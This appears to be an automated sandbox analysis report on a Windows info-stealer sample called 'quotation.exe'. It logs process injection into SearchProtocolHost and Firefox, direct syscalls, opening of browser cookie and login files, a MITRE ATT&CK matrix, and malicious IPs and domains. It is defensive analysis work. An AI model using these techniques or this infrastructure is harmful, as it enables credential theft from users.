                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A645D mov eax, dword ptr fs:[00000030h]3_2_012A645D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D245A mov eax, dword ptr fs:[00000030h]3_2_012D245A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B64AB mov eax, dword ptr fs:[00000030h]3_2_012B64AB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133A4B0 mov eax, dword ptr fs:[00000030h]3_2_0133A4B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E44B0 mov ecx, dword ptr fs:[00000030h]3_2_012E44B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A49A mov eax, dword ptr fs:[00000030h]3_2_0136A49A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B04E5 mov ecx, dword ptr fs:[00000030h]3_2_012B04E5
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132C730 mov eax, dword ptr fs:[00000030h]3_2_0132C730
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC720 mov eax, dword ptr fs:[00000030h]3_2_012EC720
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC720 mov eax, dword ptr fs:[00000030h]3_2_012EC720
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov eax, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov ecx, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov eax, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC700 mov eax, dword ptr fs:[00000030h]3_2_012EC700
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0710 mov eax, dword ptr fs:[00000030h]3_2_012B0710
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E0710 mov eax, dword ptr fs:[00000030h]3_2_012E0710
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8770 mov eax, dword ptr fs:[00000030h]3_2_012B8770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov esi, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov eax, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov eax, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01334755 mov eax, dword ptr fs:[00000030h]3_2_01334755
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E75D mov eax, dword ptr fs:[00000030h]3_2_0133E75D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0750 mov eax, dword ptr fs:[00000030h]3_2_012B0750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2750 mov eax, dword ptr fs:[00000030h]3_2_012F2750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2750 mov eax, dword ptr fs:[00000030h]3_2_012F2750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B07AF mov eax, dword ptr fs:[00000030h]3_2_012B07AF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013647A0 mov eax, dword ptr fs:[00000030h]3_2_013647A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135678E mov eax, dword ptr fs:[00000030h]3_2_0135678E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B47FB mov eax, dword ptr fs:[00000030h]3_2_012B47FB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B47FB mov eax, dword ptr fs:[00000030h]3_2_012B47FB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E7E1 mov eax, dword ptr fs:[00000030h]3_2_0133E7E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BC7C0 mov eax, dword ptr fs:[00000030h]3_2_012BC7C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013307C3 mov eax, dword ptr fs:[00000030h]3_2_013307C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B262C mov eax, dword ptr fs:[00000030h]3_2_012B262C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE627 mov eax, dword ptr fs:[00000030h]3_2_012CE627
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E6620 mov eax, dword ptr fs:[00000030h]3_2_012E6620
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8620 mov eax, dword ptr fs:[00000030h]3_2_012E8620
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2619 mov eax, dword ptr fs:[00000030h]3_2_012F2619
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E609 mov eax, dword ptr fs:[00000030h]3_2_0132E609
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA660 mov eax, dword ptr fs:[00000030h]3_2_012EA660
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA660 mov eax, dword ptr fs:[00000030h]3_2_012EA660
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137866E mov eax, dword ptr fs:[00000030h]3_2_0137866E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137866E mov eax, dword ptr fs:[00000030h]3_2_0137866E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E2674 mov eax, dword ptr fs:[00000030h]3_2_012E2674
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CC640 mov eax, dword ptr fs:[00000030h]3_2_012CC640
                Source: C:\Users\user\Desktop\quotation.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtUnmapViewOfSection: Direct from: 0x76EF2D3C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\quotation.exe; Section loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\quotation.exe; Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: read write
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Thread register set: target process: 5176
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Thread APC queued: target process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                Source: C:\Users\user\Desktop\quotation.exe; Process created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe; Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Users\user\Desktop\quotation.exe VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\quotation.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID 1567392, Sample: quotation.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100. Process chain: quotation.exe -> quotation.exe (started) -> gkTgnrvdOG.exe (injected) -> SearchProtocolHost.exe (started) -> gkTgnrvdOG.exe (injected) and firefox.exe (started).]

                Source | Detection | Scanner | Label | Link
                quotation.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
                quotation.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 209.74.77.107 | www.gadgetre.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true |
| 154.70.82.246 | conseilnsaftogo.org | Togo | 30982 | CAFENETTG | true |
| 27.124.4.246 | r0lqcud7.nbnnn.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false |
| 88.99.61.52 | phoenix88.sbs | Germany | 24940 | HETZNER-ASDE | true |
| 208.91.197.27 | www.cortisalincontrol.net | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true |
| 104.21.90.137 | www.ana-silverco.shop | United States | 13335 | CLOUDFLARENETUS | true |
| 176.32.38.130 | www.acc888ommodate.xyz | Russian Federation | 51659 | ASBAXETRU | true |
| 217.160.0.200 | carsten.studio | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true |
| 156.232.181.155 | www.5tuohbpzyj9.buzz | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true |
| 103.75.185.22 | taxitayninh365.site | Viet Nam | 63762 | VNBOOKING-AS-VNVietNamBookingcorporationVN | true |
| 155.94.253.4 | rtpmesinkoin.click | United States | 8100 | ASN-QUADRANET-GLOBALUS | true |
| 185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false |
